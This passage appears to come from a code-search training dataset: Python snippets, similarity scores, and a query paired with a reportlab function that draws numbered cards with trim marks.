G.in_edges(nd):\n resources.append(nd)\n elif not G.out_edges(nd):\n if nd != self.commodity:\n waste.append(nd)\n else:\n intmed_products.append(nd)\n\n return waste, resources, intmed_products", "def get_store_availabilities(self, store_id):\n resp = self._request_json(\"/available\", params={\"locale\": store_id})\n return resp[\"available\"]", "def available_items(self):\n return [item for item in self.all_items.values() if self.is_available(item)]", "def retrieve_handcrafted_inputs(self, obs):\n feature_units = obs.observation.feature_units\n allies = [unit for unit in feature_units if unit.alliance == _PLAYER_SELF]\n enemies = [unit for unit in feature_units if unit.alliance == _PLAYER_ENEMY]\n\n current_hp = self.calculate_hitpoints(feature_units, _PLAYER_SELF)\n current_hp = current_hp / self.initial_self_hit_points\n\n weapon_cooldown = 0\n for ally in allies:\n if ally.weapon_cooldown > 0:\n weapon_cooldown += 1\n if weapon_cooldown > (len(allies) / 2):\n # nn input weapon cooldown = 1 means the majority cannot fire\n weapon_cooldown = 1\n else:\n weapon_cooldown = 0\n\n self_weapon_range = 5\n self_radius = 1\n self_unit_type = 1\n self_speed = 1\n if len(allies) > 0:\n self_weapon_range = weapon_ranges[allies[0].unit_type]\n self_radius = unit_sizes[allies[0].unit_type] / float(2)\n self_unit_type = unit_type[allies[0].unit_type]\n self_speed = unit_speed[allies[0].unit_type]\n\n enemy_radius = 1\n enemy_weapon_range = 1\n enemy_unit_type = 0\n enemy_speed = 1\n if len(enemies) > 0:\n enemy_weapon_range = weapon_ranges[enemies[0].unit_type]\n enemy_radius = unit_sizes[enemies[0].unit_type] / float(2)\n enemy_unit_type = unit_type[enemies[0].unit_type]\n enemy_speed = unit_speed[enemies[0].unit_type]\n\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_current_location(obs)) < (\n self_radius + self_weapon_range + enemy_radius):\n enemy_in_range = 1\n else:\n enemy_in_range = 0\n\n north_bound, south_bound, west_bound, east_bound = self.calculate_distance_to_bounds(obs)\n\n if self.previous_command == \"FIGHT\":\n prev_cmd = 1\n elif self.previous_command == \"FLEE\":\n prev_cmd = 0\n\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence = self.detect_enemies_by_region(obs)\n\n return [current_hp, weapon_cooldown, enemy_in_range, prev_cmd, north_bound, south_bound, west_bound, east_bound,\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence, self_unit_type,\n enemy_unit_type, self_weapon_range, enemy_weapon_range, self_speed, enemy_speed]", "def info_equipment_get():\n equipment = _equipment_by_group()\n return equipment, 200", "def _get_legal_actions(self):\n raise NotImplementedError", "def test_models_organization_get_abilities_authenticated(self):\n organization = factories.OrganizationFactory()\n abilities = organization.get_abilities(factories.UserFactory())\n self.assertEqual(\n abilities,\n {\n \"delete\": False,\n \"get\": True,\n \"patch\": False,\n \"put\": False,\n \"manage_accesses\": False,\n },\n )", "def retrieve_handcrafted_inputs(self, obs):\n feature_units = obs.observation.feature_units\n allies = [unit for unit in feature_units if unit.alliance == _PLAYER_SELF]\n enemies = [unit for unit in feature_units if unit.alliance == _PLAYER_ENEMY]\n\n current_hp = self.calculate_hitpoints(feature_units, _PLAYER_SELF)\n current_hp = current_hp / self.initial_self_hit_points\n\n weapon_cooldown = 0\n for ally in allies:\n if ally.weapon_cooldown > 0:\n weapon_cooldown += 1\n if 
weapon_cooldown > (len(allies) / 2):\n # nn input weapon cooldown = 1 means the majority cannot fire\n weapon_cooldown = 1\n else:\n weapon_cooldown = 0\n\n self_weapon_range = 5\n self_radius = 1\n self_unit_type = 1\n self_speed = 1\n if len(allies) > 0:\n self.self_id = allies[0].unit_type\n self_weapon_range = weapon_ranges[self.self_id]\n self_radius = unit_sizes[self.self_id] / float(2)\n self_unit_type = unit_type[self.self_id]\n self_speed = unit_speed[self.self_id]\n\n enemy_radius = 1\n enemy_weapon_range = 1\n enemy_unit_type = 0\n enemy_speed = 1\n if len(enemies) > 0:\n self.enemy_id = enemies[0].unit_type\n enemy_weapon_range = weapon_ranges[self.enemy_id]\n enemy_radius = unit_sizes[self.enemy_id] / float(2)\n enemy_unit_type = unit_type[self.enemy_id]\n enemy_speed = unit_speed[self.enemy_id]\n\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_current_location(obs)) < (\n self_radius + self_weapon_range + enemy_radius):\n enemy_in_range = 1\n else:\n enemy_in_range = 0\n\n in_enemy_range = 0\n for ally in allies:\n for enemy in enemies:\n if self.retrieve_distance_between_positions([enemy.x, enemy.y], [ally.x, ally.y]) < (\n self_radius + enemy_weapon_range + enemy_radius):\n in_enemy_range = 1\n break\n else:\n in_enemy_range = 0\n\n north_bound, south_bound, west_bound, east_bound = self.calculate_distance_to_bounds(obs)\n\n if self.previous_command == \"FIGHT\":\n prev_cmd = 1\n elif self.previous_command == \"FLEE\":\n prev_cmd = 0\n\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence = self.detect_enemies_by_region(obs)\n\n return [current_hp, weapon_cooldown, enemy_in_range, in_enemy_range, prev_cmd, north_bound, south_bound,\n west_bound, east_bound,\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence, self_unit_type,\n enemy_unit_type, self_weapon_range, enemy_weapon_range, self_speed, enemy_speed, self.self_id,\n self.enemy_id]", "def available(name):\n return name in get_all()", "def getPurchasableUpgrades(self) -> list:\n pass" ]
[ "0.6250166", "0.60964966", "0.602298", "0.59705406", "0.59497154", "0.58937514", "0.5730924", "0.5714051", "0.5709866", "0.57032293", "0.56360984", "0.56252784", "0.5617863", "0.5564902", "0.5512842", "0.54977745", "0.54958105", "0.54682755", "0.54319596", "0.5417294", "0.5415358", "0.54072577", "0.54035", "0.536859", "0.5364589", "0.5339249", "0.5330102", "0.53072345", "0.5249561", "0.5249483" ]
0.72035104
0
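A hedged usage sketch for the query method above (python-sc2 API assumed; the returned inner lists are taken to line up one-to-one with the units passed in):

from sc2.bot_ai import BotAI
from sc2.ids.ability_id import AbilityId

class StimBot(BotAI):
    async def on_step(self, iteration: int):
        if not self.units:
            return
        abilities_per_unit = await self.get_available_abilities(self.units)
        for unit, abilities in zip(self.units, abilities_per_unit):
            if AbilityId.EFFECT_STIM in abilities:
                unit(AbilityId.EFFECT_STIM)  # issue the ability order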
Override this in your bot class. This function is called when a unit is created.
async def on_unit_created(self, unit: Unit):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, *args):\n this = _libsbml.new_UnitDefinition(*args)\n try: self.this.append(this)\n except: self.this = this", "def createUnit(self):\n return _libsbml.Model_createUnit(self)", "def createUnit(self):\n return _libsbml.UnitDefinition_createUnit(self)", "def __init__(self):\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)", "def _start(self, unit):\n raise NotImplementedError", "def setup_game(self):", "async def on_building_construction_started(self, unit: Unit):", "def setUp(self):\n user = User.objects.create(username=\"nerd\")\n self.description = \"Write world class code\"\n # specify owner of a event\n self.event = Event(description=self.description, owner=user)", "def setUp(self):\n self.bot = helpers.MockBot()\n self.bot.api_client.get = unittest.mock.AsyncMock()\n self.cog = information.Information(self.bot)\n self.member = helpers.MockMember(id=1234)", "def setUp(self):\n self.game = TTTBoard(3)", "def __init__(self, *args):\n this = _libsbml.new_Unit(*args)\n try: self.this.append(this)\n except: self.this = this", "def _create_user_unit(self, battlefield_role):\n print(\"\\nWhich {} unit would you like to add?\".format(battlefield_role))\n # if HQ add named characters as well\n if battlefield_role == \"HQ\":\n print(\"Named Characters (Including Wargear):\")\n keys = list(init.units_dict[\"Named Characters\"].keys())\n top_len = len(max(keys, key=len))\n for index, [keys, value] in enumerate(init.units_dict[\"Named Characters\"].items()):\n print(\"A\" + str(index + 1) + \". \" +\n keys.ljust(top_len) + \"\\t({}pts)\".format(value[\"pts\"]))\n print('') # create space between set of options\n\n print(\"Other Characters (Including base Wargear):\")\n units = list(init.units_dict[battlefield_role].keys())\n top_len = len(max(units, key=len))\n for index, [keys, value] in enumerate(init.units_dict[battlefield_role].items()):\n print(\"B\" + str(index + 1) + \". \" + keys.ljust(top_len) +\n \"\\t({}pts)\".format(value[\"pts\"]))\n else:\n # print available models and their points with the points value\n # left adjusted so they are in the same column\n print(\"Available Models (Including base Wargear):\")\n units = list(init.units_dict[battlefield_role].keys())\n top_len = len(max(units, key=len))\n for index, [keys, value] in enumerate(init.units_dict[battlefield_role].items()):\n print(str(index + 1) + \". 
\" + keys.ljust(top_len) +\n \"\\t({}pts for {} models)\".format(value[\"pts\"] * value[\"size\"][0], value[\"size\"][0]))\n\n user_input = input(\">> \")\n try:\n if user_input.lower() in {'q', 'exit', 'cancel', 'quit', 'return'}:\n return False\n elif re.match('([aAbB][1-9][0-9]*)|([1-9][0-9]*)', user_input):\n if battlefield_role == \"HQ\":\n if user_input[0] in {'A', 'a'}:\n user_input = list(init.units_dict[\"Named Characters\"].keys())[\n int(user_input[1:]) - 1]\n elif user_input[0] in {'B', 'b'}:\n user_input = list(init.units_dict[\"HQ\"].keys())[int(user_input[1:]) - 1]\n elif user_input[0].isdigit():\n user_input = list(init.units_dict[battlefield_role].keys())[int(user_input) - 1]\n\n return squad.Unit(user_input, battlefield_role)\n except (KeyError, IndexError):\n print(\"{} is not a valid option, please select the unit by name or input\".format(user_input))\n print(\"To quit please enter 'q'\")\n unit = self._create_user_unit(battlefield_role)\n return unit", "def add_unit(self):\n detach = self.army.detachments[self._get_user_detachment()]\n battlefield_role = self._get_user_battlefield_role()\n unit = self._create_user_unit(battlefield_role)\n self._add_unit(detach, unit)\n return", "def setUp(self):\n self.player = Player()", "def setUp(self):\n self.game = BuildGame()\n self.effects = []", "def __init(self):\n print(\"Welkam tu mobail lejen\")", "def setUp(self):\n self.delegate = AlwaysHitDelegate(\"\")\n self.environment = BattleEnvironment()", "async def on_building_construction_complete(self, unit: Unit):", "def create_unit(self, unit_type):\n unit = None\n\n if unit_type == 'ElfRider':\n unit = ElfRider()\n elif unit_type == 'Knight':\n unit = Knight()\n elif unit_type == \"DwarfFighter\":\n unit = DwarfFighter()\n elif unit_type == 'OrcRider':\n unit = OrcRider()\n elif unit_type == 'Fairy':\n unit = Fairy()\n elif unit_type == 'Wizard':\n unit = Wizard()\n elif unit_type == 'ElfLord':\n unit = ElfLord()\n elif unit_type == 'OrcFighter':\n unit = OrcFighter()\n\n return unit", "def __init__(self):\n self.drones = ZergUnit(UnitTypeId.DRONE, to_count=0)\n self.lings = ZergUnit(UnitTypeId.ZERGLING, to_count=999)\n self.queens = ZergUnit(UnitTypeId.QUEEN, to_count=3)\n self.roaches = ZergUnit(UnitTypeId.ROACH, to_count=100, priority=True)\n self.ravagers = ZergUnit(UnitTypeId.RAVAGER, to_count=0)\n self.defense_spines = DefensiveBuilding(\n unit_type=UnitTypeId.SPINECRAWLER, position_type=DefensePosition.Entrance, to_base_index=1, to_count=3\n )\n self.gas = StepBuildGas(to_count=3)\n\n unit_building = BuildOrder(\n [\n Step(None, self.drones, skip_until=self.should_build_drones),\n Step(UnitExists(UnitTypeId.SPAWNINGPOOL), self.defense_spines),\n Step(\n RequiredAll([UnitExists(UnitTypeId.ROACHWARREN), UnitExists(UnitTypeId.ROACH)]),\n self.ravagers,\n skip_until=self.should_build_ravagers,\n ),\n Step(UnitExists(UnitTypeId.ROACHWARREN), self.roaches),\n Step(\n RequiredAll(\n [\n UnitExists(UnitTypeId.SPAWNINGPOOL),\n UnitExists(\n UnitTypeId.ROACHWARREN,\n include_pending=True,\n include_not_ready=True,\n include_killed=True,\n ),\n ]\n ),\n self.lings,\n ),\n Step(UnitExists(UnitTypeId.SPAWNINGPOOL), self.queens),\n Step(UnitExists(UnitTypeId.SPAWNINGPOOL), self.lings),\n ]\n )\n\n buildings: BuildOrder = BuildOrder(\n [\n Step(None, ActBuilding(UnitTypeId.SPAWNINGPOOL, to_count=1)),\n Step(UnitExists(UnitTypeId.SPAWNINGPOOL), ActBuilding(UnitTypeId.ROACHWARREN, to_count=1)),\n Step(None, self.gas, skip_until=self.should_build_gas),\n ]\n )\n\n 
super().__init__(buildings, unit_building)", "async def on_unit_destroyed(self, unit_tag):", "def setUp(self):\n self.bot = helpers.MockBot()\n self.bot.api_client.get = unittest.mock.AsyncMock()\n self.cog = information.Information(self.bot)", "def create_unit(self, unit_type, unit_name, modifiers,\n nb_examples_asked=None):\n new_unit = None\n relevant_dict = None\n if unit_type == pu.UnitType.alias:\n new_unit = AliasDefinition(unit_name, modifiers)\n # new_unit = AliasDefinition(unit_name, [], modifiers.argument_name,\n # modifiers.casegen)\n relevant_dict = self.alias_definitions\n self.stats[\"#aliases\"] += 1\n elif unit_type == pu.UnitType.slot:\n new_unit = SlotDefinition(unit_name, modifiers)\n # new_unit = SlotDefinition(unit_name, [], modifiers.argument_name,\n # modifiers.casegen)\n relevant_dict = self.slot_definitions\n self.stats[\"#slots\"] += 1\n elif unit_type == pu.UnitType.intent:\n new_unit = IntentDefinition(unit_name, modifiers)\n # new_unit = IntentDefinition(unit_name, [], modifiers.argument_name,\n # modifiers.casegen)\n relevant_dict = self.intent_definitions\n self.stats[\"#intents\"] += 1\n\n if unit_type == pu.UnitType.intent and nb_examples_asked is not None:\n (train_nb, test_nb) = nb_examples_asked\n new_unit.set_nb_examples_asked(train_nb, test_nb)\n\n if unit_name not in relevant_dict:\n relevant_dict[unit_name] = new_unit\n elif modifiers.variation_name is None:\n pass # Rules will be added to the already defined unit", "def start_fixture(self):\n pass", "def createUnitDefinition(self):\n return _libsbml.Model_createUnitDefinition(self)", "def __init__(self, name=\"RandomRobot\"):\n super().__init__(name)", "def __init__(self):\n GameObject.__init__(self)\n\n # private attributes to hold the properties so they appear read only\n self._client_type = \"\"\n self._creatures = []\n self._lost = False\n self._name = \"Anonymous\"\n self._opponent = None\n self._reason_lost = \"\"\n self._reason_won = \"\"\n self._time_remaining = 0\n self._total_health = 0\n self._won = False", "def __init__(self, lunit=\"nm\"):\n super().__init__(lunit)", "def setUp(self):\n self.t = Timew()", "def setUp(self):\n self.t = Timew()" ]
[ "0.6457518", "0.62285805", "0.62217605", "0.615402", "0.61094606", "0.6098572", "0.60835135", "0.60660774", "0.6036553", "0.60170555", "0.5984654", "0.5978691", "0.59778404", "0.5977131", "0.59517694", "0.594605", "0.59400856", "0.5938614", "0.59215844", "0.5919174", "0.58836854", "0.58530736", "0.58447", "0.57913274", "0.5776574", "0.575998", "0.57592523", "0.57545316", "0.5749272", "0.5749272" ]
0.8054851
0
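A minimal override of the hook defined in the record above; the signature comes straight from the record, and only the logging body is added for illustration.

from sc2.bot_ai import BotAI
from sc2.unit import Unit

class GreeterBot(BotAI):
    async def on_unit_created(self, unit: Unit):
        # Called once for each newly finished unit.
        print(f"created: {unit.type_id.name} at {unit.position}")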
Override this in your bot class. This function is called when a building construction has started.
async def on_building_construction_started(self, unit: Unit):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def on_building_construction_complete(self, unit: Unit):", "def pre_build(self):\n pass", "def buildStarted(builderName, build):", "def post_build(self):\n pass", "def pre_build(self):", "def build(self):\n pass", "def build(self):\n pass", "def build(self, *args, **kwargs):\n return", "def start_build(self, build_id):\n pass", "def build(self) -> None:", "def post_build(self):", "def _build(self):", "def _build(self):", "def pre_build_hook(self):", "def build(self):", "def build(self):", "def build(self):", "def post_build_hook(self):", "def setup(self):\n build_world.start_level(self)", "def build():", "def build_step(self):\n\n pass", "def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setup_start_agents = False", "def _build(self, **kwargs):", "def initialize(self):\n logger.debug(\"Begin Generation\")\n self.events.begin_generation()", "def build(self):\n\n return True", "def build(self):\n\n return True", "def __init__(self):\n\n super().__init__()\n self.setup_janggi_game()\n self._game_state = 'UNFINISHED'\n self._player_turn = 'BLUE'", "def build_step(self):\n pass", "def build_step(self):\n pass", "def finish_initializing(self, builder):\n #get a reference to the builder and set up the signals\n self.builder = builder\n self.builder.connect_signals(self)\n\n #code for other initialization actions should be added here" ]
[ "0.71568626", "0.70379823", "0.69460714", "0.69012374", "0.6849467", "0.6844997", "0.6844997", "0.67909837", "0.66983306", "0.669102", "0.6681456", "0.6529149", "0.6529149", "0.64592683", "0.6445391", "0.6445391", "0.6445391", "0.64213693", "0.6402814", "0.6315138", "0.6309704", "0.62994426", "0.62782824", "0.62733483", "0.6258543", "0.6258543", "0.6258468", "0.62523526", "0.62523526", "0.62264127" ]
0.8047466
0
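The construction-start hook above can be overridden the same way; a sketch, again assuming the python-sc2 API:

from sc2.bot_ai import BotAI
from sc2.unit import Unit

class BuildLogger(BotAI):
    async def on_building_construction_started(self, unit: Unit):
        # Fires when a worker begins constructing a structure.
        print(f"started: {unit.type_id.name} at {unit.position}")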
Override this in your bot class. This function is called when a building construction is completed.
async def on_building_construction_complete(self, unit: Unit):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def on_building_construction_started(self, unit: Unit):", "def post_build(self):\n pass", "def build(self):\n pass", "def build(self):\n pass", "def post_build(self):", "def build(self, *args, **kwargs):\n return", "def build(self) -> None:", "def buildStarted(builderName, build):", "def post_build_hook(self):", "def _build(self):", "def _build(self):", "def pre_build(self):\n pass", "def build(self):", "def build(self):", "def build(self):", "def build(self):\n\n return True", "def build(self):\n\n return True", "def trigger_build(self, postdata):\n pass", "def finish_initializing(self, builder):\n #get a reference to the builder and set up the signals\n self.builder = builder\n self.builder.connect_signals(self)\n\n #code for other initialization actions should be added here", "def pre_build(self):", "def _build(self, **kwargs):", "def build (self):\n raise NotImplementedError", "def build(self):\n raise NotImplementedError", "def build(self, build):\n\n self._build = build", "def buildFinished(builderName, build, results):", "def build(self):\n\n raise NotImplementedError(\"Implement build() method\")", "def build():", "def build(self):\n raise NotImplementedError(\"This should have been implemented.\")", "def build_step(self):\n\n pass", "def build(_):" ]
[ "0.8173408", "0.7156912", "0.6900785", "0.6900785", "0.68998843", "0.68363357", "0.67636555", "0.6597493", "0.6520906", "0.65182143", "0.65182143", "0.64467186", "0.643994", "0.643994", "0.643994", "0.6406651", "0.6406651", "0.635233", "0.6332181", "0.6324402", "0.6277865", "0.6271622", "0.6268811", "0.62478405", "0.624753", "0.6234444", "0.6220646", "0.6214411", "0.62075275", "0.61850214" ]
0.79730487
1
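A matching sketch for the completion hook above, keeping a simple running count of finished structures:

from sc2.bot_ai import BotAI
from sc2.unit import Unit

class CompletionTracker(BotAI):
    def __init__(self):
        super().__init__()
        self.finished_buildings = 0

    async def on_building_construction_complete(self, unit: Unit):
        self.finished_buildings += 1
        print(f"building #{self.finished_buildings} done: {unit.type_id.name}")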
Override this in your bot class. This function is called with the upgrade id of an upgrade that was not finished last step and is now.
async def on_upgrade_complete(self, upgrade: UpgradeId):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _do_upgrade(self, step):\n request = self.layer['request']\n request.form['profile_id'] = self.profile_id\n request.form['upgrades'] = [step['id']]\n self.setup.manage_doUpgrades(request=request)", "def _do_upgrade(self, step):\n request = self.layer['request']\n request.form['profile_id'] = self.profile_id\n request.form['upgrades'] = [step['id']]\n self.setup.manage_doUpgrades(request=request)", "def _do_upgrade_step(self, step):\n request = self.layer['request']\n request.form['profile_id'] = self.profile_id\n request.form['upgrades'] = [step['id']]\n self.setup.manage_doUpgrades(request=request)", "def _do_upgrade_step(self, step):\n request = self.layer['request']\n request.form['profile_id'] = PROFILE\n request.form['upgrades'] = [step['id']]\n self.setup.manage_doUpgrades(request=request)", "def upgrade(self) -> Optional[pulumi.Input['UpgradeNoteArgs']]:\n return pulumi.get(self, \"upgrade\")", "def upgrade(self) -> pulumi.Output['outputs.UpgradeNoteResponse']:\n return pulumi.get(self, \"upgrade\")", "async def upgrade(\n event,\n spell: ('str', 'select a spell'),\n):\n spell = get_spell_or_abort(spell)\n \n return f'{event.user:f} just upgraded their {spell}; It was a *next* level move!'", "def full_upgrade(self):\n return self.upgrade(\"full-upgrade\")", "def upgrade(self):", "def upgrade(self):", "def test_do_upgrade(self):\n with self.with_config_update():\n result = self.runner.invoke(\n cli,\n [\n \"upgrade\",\n *self.LOCAL,\n self.ITEM_TYPE,\n f\"{self.ITEM_PUBLIC_ID.author}/{self.ITEM_PUBLIC_ID.name}:latest\",\n ],\n standalone_mode=False,\n )\n assert result.exit_code == 0", "def agent_upgrade(self) -> Optional[pulumi.Input['AgentUpgradeArgs']]:\n return pulumi.get(self, \"agent_upgrade\")", "def update_goal(self):\n pass", "def _get_upgrade_step(self, title):\n self.setup.setLastVersionForProfile(self.profile_id, self.from_version)\n upgrades = self.setup.listUpgrades(self.profile_id)\n steps = [s for s in upgrades[0] if s['title'] == title]\n return steps[0] if steps else None", "def getUpgrade(self):\n\t\tquery = ''\n\t\tconn = self.get_connection()\n\t\theaders = { 'Content-type' : 'application/json', 'Authorization' : 'A10 %s' %self.sessionid}\n\t\tconn.request('GET', self.get_path() + '/' + query, headers=headers)\n\t\tresponse = conn.getresponse()\n\t\texpected_status = 200\n\t\terrors = {500: 'An unexpected runtime exception', 404: 'Specified upgrade does not exist'}\n\t\tpayload = self.get_output(response, expected_status, errors)\n\t\tconn.close()\n\t\tif self.debug:\n\t\t\tprint 'payload:', payload\n\t\tif payload == '':\n\t\t\tpayload = None\n\t\tif payload is not None:\n\t\t\tdata = json.loads(payload)\n\t\t\tpayload= data.get('upgrade')\n\t\treturn deserialize_Upgrade_json(payload)", "def agent_upgrade(self) -> pulumi.Output[Optional['outputs.AgentUpgradeResponse']]:\n return pulumi.get(self, \"agent_upgrade\")", "def buyUpgrade(self, upgrade_id: str) -> None:\n # TODO index the available instead so that you don't need to do a search every time\n upgrade_to_buy = next(\n (\n upgrade\n for upgrade in self.available_upgrades\n if upgrade[\"ID\"] == upgrade_id\n )\n )\n # TODO maybe change this into have a more intuitive location for cost\n cost = next(\n (\n requirement.get(\"amount\")\n for requirement in upgrade_to_buy[\"REQUIREMENTS\"]\n if requirement[\"type\"] == \"CURRENCY\"\n ),\n 0,\n )\n\n # TODO fail if the player does not have enough cash\n\n self.changeCash(-cost)\n self.state[UPGRADES].append(upgrade_to_buy)", "def _get_upgrade_step(self, 
title):\n self.setup.setLastVersionForProfile(PROFILE, self.from_version)\n upgrades = self.setup.listUpgrades(PROFILE)\n steps = [s for s in upgrades[0] if s['title'] == title]\n return steps[0] if steps else None", "def update_turn(self):\n pass", "def mep_260(ctx):\n click.secho(\"Start migration v2.6\", fg=\"cyan\")\n click.secho(\"Nothing\", fg=\"cyan\")", "def upgrade_message(msg):\n wait_for_end_of_video()\n\n if ADDON.getSetting('lastnotified_version') < ADDON_VERSION:\n xbmcgui.Dialog().ok(\n ADDON_NAME,\n '[CR]'.join([localise(msg), localise(32001), localise(32002)])\n )\n else:\n log('Already notified one time for upgrading.')", "def test_upgrade_to_latest_but_same_version(self):\n with pytest.raises(\n ClickException,\n match=r\"The .* with id '.*' already has version .*. Nothing to upgrade.\",\n ):\n self.runner.invoke(\n cli,\n [\n \"upgrade\",\n *self.LOCAL,\n self.ITEM_TYPE,\n f\"{self.ITEM_PUBLIC_ID.author}/{self.ITEM_PUBLIC_ID.name}:latest\",\n ],\n standalone_mode=False,\n catch_exceptions=False,\n )", "def update(self, is_my_turn, clue_word, clue_num_guesses, guesses):\r\n pass", "def submitUpgrade(self, upgrade):\n\t\tquery = ''\n\t\tconn = self.get_connection()\n\t\theaders = { 'Content-type' : 'application/json', 'Authorization' : 'A10 %s' %self.sessionid}\n\t\toutput=OrderedDict()\n\t\toutput['upgrade']=serialize_Upgrade_json(upgrade)\n\t\tpayload = serialize_final_json(output)\n\t\tconn.request('POST', self.get_path() + '/' + query, payload, headers)\n\t\tresponse = conn.getresponse()\n\t\texpected_status = 200\n\t\terrors = {500: 'An unexpected runtime exception'}\n\t\tpayload = self.get_output(response, expected_status, errors)\n\t\tconn.close()\n\t\tif self.debug:\n\t\t\tprint 'payload:', payload\n\t\tif payload == '':\n\t\t\tpayload = None\n\t\treturn deserialize_string_json(payload)", "def after_turn(self):\n pass", "async def _upgrade_db(self) -> None:\n cur_version = await self._get_db_version()\n for n in range(cur_version + 1, sql_data.CUR_VERSION + 1):\n log.msg('Upgrading database to version %d' % n)\n if n in sql_data.SQL_UPGRADES:\n for command in sql_data.SQL_UPGRADES[n]:\n await self.operation(command)\n if cur_version != sql_data.CUR_VERSION:\n await self._set_db_version(sql_data.CUR_VERSION)", "def test_new_upgrade_pending(\n mocker, state, slack, ouw_oc_map, ouw_ocm_map, upgrade_config, dt\n):\n dt.utcnow.return_value = upgrade_at - timedelta(hours=1)\n gso = mocker.patch(\n \"reconcile.openshift_upgrade_watcher._get_start_osd\", autospec=True\n )\n gso.return_value = upgrade_at.strftime(\"%Y-%m-%dT%H:%M:%SZ\"), upgrade_version\n ouw.notify_upgrades_start(\n ocm_map=ouw_ocm_map,\n oc_map=ouw_oc_map,\n clusters=[load_cluster(\"cluster1.yml\")],\n state=state,\n slack=slack,\n )\n assert slack.chat_post_message.call_count == 0\n assert state.add.call_count == 0", "def outdated(self, arguments):\n puts_err(colored.red(\"Not implemented!\"))", "def notify_upgrade(app, flash):\n if app.specter.version.upgrade:\n flash(\n f\"Upgrade notification: new version {app.specter.version.latest} is available.\",\n \"info\",\n )\n return app.specter.version.current", "def command_upgrade(self):\n args = [\n self.cfg.bin_dir / \"arangodb\",\n \"upgrade\",\n \"--starter.endpoint\",\n self.get_http_protocol() + \"://127.0.0.1:\" + str(self.get_my_port()),\n ]\n logging.info(\"StarterManager: Commanding upgrade:\")\n lh.log_cmd(\" \".join([str(arg) for arg in args]))\n self.upgradeprocess = psutil.Popen(\n args,\n # stdout=subprocess.PIPE,\n # 
stdin=subprocess.PIPE,\n # stderr=subprocess.PIPE,\n universal_newlines=True,\n )\n print(\"Upgrade commander has PID:\" + str(self.upgradeprocess.pid))" ]
[ "0.6285916", "0.6285916", "0.62116206", "0.61345583", "0.61170655", "0.6087209", "0.59450597", "0.5708717", "0.56726635", "0.56726635", "0.56370175", "0.55625856", "0.55596054", "0.55466664", "0.55025387", "0.54930997", "0.5485448", "0.54780704", "0.54131603", "0.53243494", "0.5296793", "0.5269556", "0.52600324", "0.5253681", "0.5249684", "0.5220876", "0.5178374", "0.5156604", "0.5154555", "0.5150112" ]
0.7309425
0
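A sketch of reacting to the upgrade hook above; UpgradeId.ZERGLINGMOVEMENTSPEED is assumed to be the enum member for Metabolic Boost.

from sc2.bot_ai import BotAI
from sc2.ids.upgrade_id import UpgradeId

class UpgradeWatcher(BotAI):
    async def on_upgrade_complete(self, upgrade: UpgradeId):
        # Runs once per upgrade that finished since the last step.
        if upgrade == UpgradeId.ZERGLINGMOVEMENTSPEED:
            print("Metabolic Boost finished")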
Draw number cards on the specified reportlab canvas
def draw_numbercards(c, n, ncol, nrow, prefix='', suffix='', pagesize=pagesizes.A4, orientation=pagesizes.landscape, margin=(8.4*mm, 8.4*mm), font_family='Arimo-Regular', font_size=20, face_color=(0.1,0.1,0.1), stroke_color=(0.6,0.6,0.6), trimmark=True): # calculate size xmargin, ymargin = margin pwidth, pheight = orientation(pagesize) width = pwidth - xmargin*2 height = pheight - ymargin*2 swidth = width / ncol sheight = height / nrow def draw_trimmark(col, row): x = xmargin + swidth * col y = ymargin + sheight * row if row == 0: c.line(x, ymargin-TRIMMARK_HEIGHT, x, ymargin) c.line(x-TRIMMARK_MINOR_WIDTH/2, ymargin, x+TRIMMARK_MINOR_WIDTH/2, ymargin) elif row == nrow-1: c.line(x, pheight-(ymargin-TRIMMARK_HEIGHT), x, pheight-ymargin) c.line(x-TRIMMARK_MINOR_WIDTH/2, pheight-ymargin, x+TRIMMARK_MINOR_WIDTH/2, pheight-ymargin) if col == 0: c.line(xmargin-TRIMMARK_WIDTH, y, xmargin, y) c.line(xmargin, y-TRIMMARK_MINOR_HEIGHT/2, xmargin, y+TRIMMARK_MINOR_HEIGHT/2) elif col == ncol-1: c.line(pwidth-(xmargin-TRIMMARK_WIDTH), y, pwidth-xmargin, y) c.line(pwidth-xmargin, y-TRIMMARK_MINOR_HEIGHT/2, pwidth-xmargin, y+TRIMMARK_MINOR_HEIGHT/2) index = 1 while index <= n: c.setPageSize(orientation(pagesize)) c.setFont(font_family, font_size) c.setFillColorRGB(*face_color) c.setStrokeColorRGB(*stroke_color) for row in range(nrow): for col in range(ncol): # calculate center x = xmargin + swidth * col + swidth / 2 y = ymargin + sheight * (nrow-row-1) + sheight / 2 # draw number with prefix, suffix c.drawCentredString(x, y, prefix+str(index)+suffix) # increate the number index += 1 # draw trimmark if trimmark: draw_trimmark(col, row) if trimmark: draw_trimmark(ncol, 0) draw_trimmark(ncol, nrow-1) draw_trimmark(0, nrow) draw_trimmark(ncol-1, nrow) # newpage c.showPage() return c
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
